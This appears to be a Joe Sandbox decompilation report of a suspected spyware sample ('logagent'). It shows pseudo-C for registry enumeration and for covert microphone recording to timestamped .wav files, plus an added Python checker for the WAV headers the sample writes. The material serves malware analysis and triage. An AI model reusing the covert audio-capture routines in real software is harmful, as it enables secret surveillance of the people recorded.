                                  					_t35 = E00412855(_t54,  &_v152, 0x41bdd0);
                                  					_t56 = 0x41b310;
                                  					_t38 =  &_v88;
                                  					L00414176();
                                  					_t39 =  &_v56;
                                  					L00414140();
                                  					_t40 =  &_v40;
                                  					L00414140();
                                  					_t41 =  &_v24;
                                  					L00414140();
                                  					_t42 =  &_v72;
                                  					L00414140();
                                  					_t43 =  &_v104;
                                  					L00414140();
                                  					_t44 =  &_v136;
                                  					L00414140();
                                  					L00414140();
                                  					E004020C2(0x41bde0, 0x71, _t79 - 0x10);
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t44, _t44, _t43, _t43, _t42, _t42, _t41, _t41, _t40, _t40, _t39, _t39, _t38, _t38, _t73, 0x41b310, E00412855(_t56,  &_v120, 0x41be40), 0x41b310, _t35, 0x41be30, 0x41b310, 0x41be50);
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(0x415800);
                                  					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(0x415800);
                                  					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
                                  					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
                                  					RegCloseKey(_v8);
                                  					_t47 = 1;
                                  				}
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return _t47;
                                  			}

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,00000004), ref: 0040BE49
                                    • Part of subcall function 0040BD9B: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,0040BE54,?,?,00000004), ref: 0040BDAE
                                    • Part of subcall function 0040BD9B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE1E
                                  • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,0040C731), ref: 0040BE67
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00415B14,0041B310,00000000,0041B310,00000000,0041B310,0041BE30,0041B310,0041BE50), ref: 0040BECF
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041BE30,0041B310,0041BE50), ref: 0040BEDC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,0041BE50), ref: 0040BEE9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,0041BE50), ref: 0040BEF6
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,0041BE50), ref: 0040BF03
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040BF10
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040BF20
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040BF2A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000071), ref: 0040BF44
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF4D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF56
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF5F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF68
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF71
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF7A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF83
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF8F
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00415800), ref: 0040BFA0
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00415800), ref: 0040BFAC
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 0040BFBD
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 0040BFC9
                                  • RegCloseKey.ADVAPI32(0040C731), ref: 0040BFD2
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B1C,?), ref: 0040BFEA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000072), ref: 0040BFFF
                                    • Part of subcall function 0040BB20: RegQueryInfoKeyW.ADVAPI32(0040BE7D,?,00000104,00000000,0040BE7D,?,?,00000000,?,?,?,?), ref: 0040BB8F
                                    • Part of subcall function 0040BB20: RegEnumKeyExW.ADVAPI32 ref: 0040BBBE
                                    • Part of subcall function 0040BB20: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?), ref: 0040BBD4
                                    • Part of subcall function 0040BB20: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040BBE6
                                    • Part of subcall function 0040BB20: ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0040BE7D,0040C731), ref: 0040BBF4
                                    • Part of subcall function 0040BB20: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BBFD
                                    • Part of subcall function 0040BB20: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BC06
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$G@std@@V10@0@$G@2@@std@@$V01@$??4?$basic_string@$??0?$basic_string@$V01@@V10@@$??8std@@CloseD@1@@EnumG@1@@G@2@@0@InfoOpenQueryY?$basic_string@
                                  • String ID:
                                  • API String ID: 3909728815-0
                                  • Opcode ID: 44452b3970c12fbfe81523bb04a4af9efa481a2b540b5195b71022166c9d3698
                                  • Instruction ID: 9e337717dcf7d24ebdd05483ab6efa78b4c81bdad12c42f1fd6fa3557793e14f
                                  • Opcode Fuzzy Hash: 44452b3970c12fbfe81523bb04a4af9efa481a2b540b5195b71022166c9d3698
                                  • Instruction Fuzzy Hash: 7741477290020DEBCB04BBE1ED4ADDE7B7CDF94345B10403AF506A7152EB785A85CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 20%
                                  			E00401640(void* __edx, intOrPtr _a8, char _a11) {
                                  				char _v5;
                                  				char _v12;
                                  				void* _v28;
                                  				char _v44;
                                  				char _v60;
                                  				char _v76;
                                  				char _v92;
                                  				char _v108;
                                  				char _v188;
                                  				int _t23;
                                  				char* _t25;
                                  				char* _t32;
                                  				char* _t33;
                                  				char* _t34;
                                  				CHAR* _t36;
                                  				intOrPtr _t37;
                                  				void* _t56;
                                  
                                  				_t23 =  &_v5;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z(_t23);
                                  				if(_a8 == 0x3c0) {
                                  					__imp__time( &_v12, _t56);
                                  					_t25 =  &_v12;
                                  					__imp__localtime(_t25);
                                  					__imp__strftime( &_v188, 0x50, "%Y-%m-%d %H.%M", _t25);
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v188,  &_a11);
                                  					_t32 =  &_v76;
                                  					L00414152();
                                  					_t33 =  &_v108;
                                  					L0041414C();
                                  					_t34 =  &_v60;
                                  					L00414146();
                                  					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t34, _t34, _t33, _t33, _t32, _t32, 0x41b1e8, 0x5c, E00412795( &_v92,  &_v44), L".wav");
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					E004013BE(_t34, 0x41b1a0);
                                  					_t36 = waveInUnprepareHeader( *0x41b210, 0x41b1a0, 0x20);
                                  					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  					0x41b1a0->lpData = _t36;
                                  					_t37 =  *0x41b1d8; // 0x0
                                  					 *0x41b1a4 = _t37;
                                  					 *0x41b1a8 = 0;
                                  					 *0x41b1ac = 0;
                                  					 *0x41b1b0 = 0;
                                  					 *0x41b1b4 = 0;
                                  					waveInPrepareHeader( *0x41b210, 0x41b1a0, 0x20);
                                  					_t23 = waveInAddBuffer( *0x41b210, 0x41b1a0, 0x20);
                                  				}
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _t23;
                                  			}

                                  APIs
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00401650
                                  • time.MSVCRT ref: 00401668
                                  • localtime.MSVCRT ref: 00401672
                                  • strftime.MSVCRT ref: 00401687
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 0040169E
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,0041B1E8,0000005C,00000000,.wav), ref: 004016C4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,.wav), ref: 004016D1
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00000000,.wav), ref: 004016DE
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000,.wav), ref: 004016EA
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004016F3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004016FC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401705
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 0040170E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401717
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041B1A0,?,?,?,?,?,?,?,00000000,.wav), ref: 00401726
                                    • Part of subcall function 004013BE: CreateFileW.KERNEL32(00401732,40000000,00000000,00000000,00000002,00000080,00000000,?,0041B1A0), ref: 00401424
                                  • waveInUnprepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040173D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,00000000,.wav), ref: 00401748
                                  • waveInPrepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040177C
                                  • waveInAddBuffer.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040178B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000,.wav), ref: 00401795
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@2@@std@@D@std@@$??0?$basic_string@$G@2@@0@Hstd@@V?$basic_string@wave$?begin@?$basic_string@?c_str@?$basic_string@G@1@@HeaderV01@@V10@$??4?$basic_string@?end@?$basic_string@?length@?$basic_string@BufferCreateD@1@@FilePrepareUnprepareV01@V10@0@localtimestrftimetime
                                  • String ID: %Y-%m-%d %H.%M$.wav
                                  • API String ID: 4079669728-3597965672
                                  • Opcode ID: 65b9f5944380e4cbf397f0c8d18f8494b2e2b8de5bcf2efd9865c90dbcd23412
                                  • Instruction ID: bf0964d1dea1fddfd3b2107398812174aa57f11fbff5416b66007043dfe7270a
                                  • Opcode Fuzzy Hash: 65b9f5944380e4cbf397f0c8d18f8494b2e2b8de5bcf2efd9865c90dbcd23412
                                  • Instruction Fuzzy Hash: C641F87180060DEFDB00EBA0EC5DADE7B79EB48345F448036F505E71A0EB746689CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 95%
			E004013BE(long _a4, void** _a8) {                                // _a4: wide filename; _a8: WAVEHDR (_a8[0] = lpData, _a8[1] = dwBufferLength)
				void _v8;                                                     // RIFF chunk size
				void _v12;                                                    // fmt chunk size (0x10)
				void _v16;                                                    // wFormatTag (1 = WAVE_FORMAT_PCM)
				void _v20;                                                    // nAvgBytesPerSec
				void _v24;                                                    // nBlockAlign
				void _v28;                                                    // data chunk size
				signed int _t37;
				signed int _t41;
				void* _t82;
				signed int _t83;
				signed int _t89;

				_t83 =  *0x41b21a & 0x0000ffff;                               // nChannels (global WORD)
				_t37 = ( *0x41b226 & 0x0000ffff) * _t83;                      // wBitsPerSample * nChannels
				_v20 = _t37 *  *0x41b21c >> 3;                                // nAvgBytesPerSec = bits * channels * nSamplesPerSec / 8
				asm("cdq");
				_t89 = 8;
				_v16 = 1;
				_v12 = 0x10;
				_v24 = _t37 / _t89;                                           // nBlockAlign = bits * channels / 8
				_t41 = _a8[1] * _t83;                                         // declared data size = dwBufferLength * nChannels ...
				_v28 = _t41;
				_v8 = _t41 + 0x24;                                            // RIFF size = 36 + data size
				_t82 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0x80, 0);        // GENERIC_WRITE, no sharing, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL
				if(_t82 != 0xffffffff) {                                      // INVALID_HANDLE_VALUE; from here _a4 is reused as lpNumberOfBytesWritten
					WriteFile(_t82, "RIFF", 4,  &_a4, 0);
					WriteFile(_t82,  &_v8, 4,  &_a4, 0);                      // RIFF size
					WriteFile(_t82, "WAVE", 4,  &_a4, 0);
					WriteFile(_t82, "fmt ", 4,  &_a4, 0);
					WriteFile(_t82,  &_v12, 4,  &_a4, 0);                     // fmt size = 16
					WriteFile(_t82,  &_v16, 2,  &_a4, 0);                     // wFormatTag = 1
					WriteFile(_t82, 0x41b21a, 2,  &_a4, 0);                   // nChannels
					WriteFile(_t82, 0x41b21c, 4,  &_a4, 0);                   // nSamplesPerSec
					WriteFile(_t82,  &_v20, 4,  &_a4, 0);                     // nAvgBytesPerSec
					WriteFile(_t82,  &_v24, 2,  &_a4, 0);                     // nBlockAlign
					WriteFile(_t82, 0x41b226, 2,  &_a4, 0);                   // wBitsPerSample
					WriteFile(_t82, "data", 4,  &_a4, 0);
					WriteFile(_t82,  &_v28, 4,  &_a4, 0);                     // data size (scaled by nChannels above)
					WriteFile(_t82,  *_a8, _a8[1],  &_a4, 0);                 // ... but only dwBufferLength bytes of PCM are written, so the header overstates the payload whenever nChannels > 1
					CloseHandle(_t82);
					return 1;
				}
				return 0;
			}
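A consistency check for the .wav files this routine produces, added here as an example; it is neither part of the sample nor of the Joe Sandbox output. It assumes that the three globals read above (0x41b21a, 0x41b21c, 0x41b226) hold nChannels, nSamplesPerSec and wBitsPerSample, which follows from where they land in the header write sequence, and that _a8 points at a WAVEHDR (lpData, then dwBufferLength); the PCM payload is constructed. Because E004013BE declares the data chunk as dwBufferLength × nChannels but writes only dwBufferLength bytes, the checker flags any recovered capture whose header overstates its payload, which is the useful signal when triaging files that match the `%Y-%m-%d %H.%M.wav` naming seen in the caller above.

```python
import struct

# Field order of the 44-byte header that E004013BE writes, little-endian:
#   "RIFF" riff_size "WAVE" "fmt " fmt_size(0x10) wFormatTag(1) nChannels
#   nSamplesPerSec nAvgBytesPerSec nBlockAlign wBitsPerSample "data" data_size
HEADER_FMT = "<4sI4s4sIHHIIHH4sI"
HEADER_LEN = struct.calcsize(HEADER_FMT)   # 44 bytes
FIELDS = ("riff", "riff_size", "wave", "fmt_tag", "fmt_size", "format",
          "channels", "sample_rate", "byte_rate", "block_align", "bits",
          "data_tag", "data_size")


def build_header_like_sample(channels, sample_rate, bits, buffer_len):
    """Constructed reproduction of the arithmetic in E004013BE.

    Assumption: the globals at 0x41b21a / 0x41b21c / 0x41b226 hold nChannels,
    nSamplesPerSec and wBitsPerSample; buffer_len stands in for _a8[1]
    (WAVEHDR.dwBufferLength).
    """
    bits_x_ch = bits * channels                    # _t37
    byte_rate = (bits_x_ch * sample_rate) >> 3     # _v20
    block_align = bits_x_ch // 8                   # _v24
    data_size = buffer_len * channels              # _v28 (scaled by channel count, as in the sample)
    riff_size = data_size + 0x24                   # _v8
    return struct.pack(HEADER_FMT, b"RIFF", riff_size, b"WAVE", b"fmt ", 0x10,
                       1, channels, sample_rate, byte_rate, block_align, bits,
                       b"data", data_size)


def parse_wav_header(blob):
    """Parse a canonical 44-byte PCM header; raise ValueError if the magic is off."""
    if len(blob) < HEADER_LEN:
        raise ValueError("file shorter than a WAV header")
    hdr = dict(zip(FIELDS, struct.unpack(HEADER_FMT, blob[:HEADER_LEN])))
    if (hdr["riff"], hdr["wave"], hdr["fmt_tag"], hdr["data_tag"]) != (b"RIFF", b"WAVE", b"fmt ", b"data"):
        raise ValueError("not a canonical RIFF/WAVE/fmt /data layout")
    return hdr


def check_wav(blob):
    """Return a list of header-vs-payload inconsistencies (empty list = consistent)."""
    hdr = parse_wav_header(blob)
    issues = []
    if hdr["format"] != 1:
        issues.append("wFormatTag is not PCM (1)")
    if hdr["fmt_size"] != 0x10:
        issues.append("fmt chunk size is not 16")
    block_align = hdr["channels"] * hdr["bits"] // 8
    if hdr["block_align"] != block_align:
        issues.append("nBlockAlign != channels*bits/8")
    if hdr["byte_rate"] != hdr["sample_rate"] * block_align:
        issues.append("nAvgBytesPerSec != nSamplesPerSec*nBlockAlign")
    if hdr["riff_size"] != hdr["data_size"] + 36:
        issues.append("riff_size != data_size + 36")
    payload = len(blob) - HEADER_LEN
    if hdr["data_size"] != payload:
        issues.append("data_size %d != actual payload %d" % (hdr["data_size"], payload))
    return issues


def demo():
    """Constructed PCM payload (not a real capture): 1000 bytes of silence,
    wrapped once as mono and once as stereo the way the sample would."""
    pcm = bytes(1000)
    mono = build_header_like_sample(1, 44100, 16, len(pcm)) + pcm
    stereo = build_header_like_sample(2, 44100, 16, len(pcm)) + pcm
    return check_wav(mono), check_wav(stereo)


if __name__ == "__main__":
    for label, issues in zip(("mono", "stereo"), demo()):
        print(label, "OK" if not issues else issues)
```

For a mono configuration the header the sample emits is internally consistent; for two channels the declared data size is twice the bytes actually written, and `check_wav` reports exactly that mismatch while every other field still cross-checks.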

                                  APIs
                                  • CreateFileW.KERNEL32(00401732,40000000,00000000,00000000,00000002,00000080,00000000,?,0041B1A0), ref: 00401424
                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,00000010,00000000,?,0041B1A0), ref: 0040144B
                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000010,00000000,?,0041B1A0), ref: 00401459
                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000010,00000000,?,0041B1A0), ref: 00401468
                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000010,00000000,?,0041B1A0), ref: 00401477
                                  • WriteFile.KERNEL32(00000000,00000010,00000004,00000010,00000000,?,0041B1A0), ref: 00401485
                                  • WriteFile.KERNEL32(00000000,00000001,00000002,00000010,00000000,?,0041B1A0), ref: 00401493
                                  • WriteFile.KERNEL32(00000000,0041B21A,00000002,00000010,00000000,?,0041B1A0), ref: 004014A2
                                  • WriteFile.KERNEL32(00000000,0041B21C,00000004,00000010,00000000,?,0041B1A0), ref: 004014B1
                                  • WriteFile.KERNEL32(00000000,?,00000004,00000010,00000000,?,0041B1A0), ref: 004014BF
                                  • WriteFile.KERNEL32(00000000,?,00000002,00000010,00000000,?,0041B1A0), ref: 004014CD
                                  • WriteFile.KERNEL32(00000000,0041B226,00000002,00000010,00000000,?,0041B1A0), ref: 004014DC
                                  • WriteFile.KERNEL32(00000000,data,00000004,00000010,00000000,?,0041B1A0), ref: 004014EB
                                  • WriteFile.KERNEL32(00000000,?,00000004,00000010,00000000,?,0041B1A0), ref: 004014F9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Write$Create
                                  • String ID: RIFF$WAVE$data$fmt
                                  • API String ID: 1602526932-4212202414
                                  • Opcode ID: a99678cb21b7d93cbe87bee30868a2d6c3fec46b9c3e62da9134e588c1076753
                                  • Instruction ID: 91b5b913efd348db76e64cf746c5e08b94ff9205a7cc9a5ceb03776573d28bcb
                                  • Opcode Fuzzy Hash: a99678cb21b7d93cbe87bee30868a2d6c3fec46b9c3e62da9134e588c1076753
                                  • Instruction Fuzzy Hash: 6F411CB654021CBAD7109BA1DC89FEB7FBCEBC5B10F008416BA06EA181D674D744CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401B3E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401B4B
                                    • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                    • Part of subcall function 004124BE: time.MSVCRT ref: 004124E5
                                    • Part of subcall function 004124BE: srand.MSVCRT ref: 004124F2
                                    • Part of subcall function 004124BE: rand.MSVCRT ref: 00412506
                                    • Part of subcall function 004124BE: rand.MSVCRT ref: 0041251A
                                    • Part of subcall function 004124BE: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                    • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                    • Part of subcall function 004124BE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B5D
                                    • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
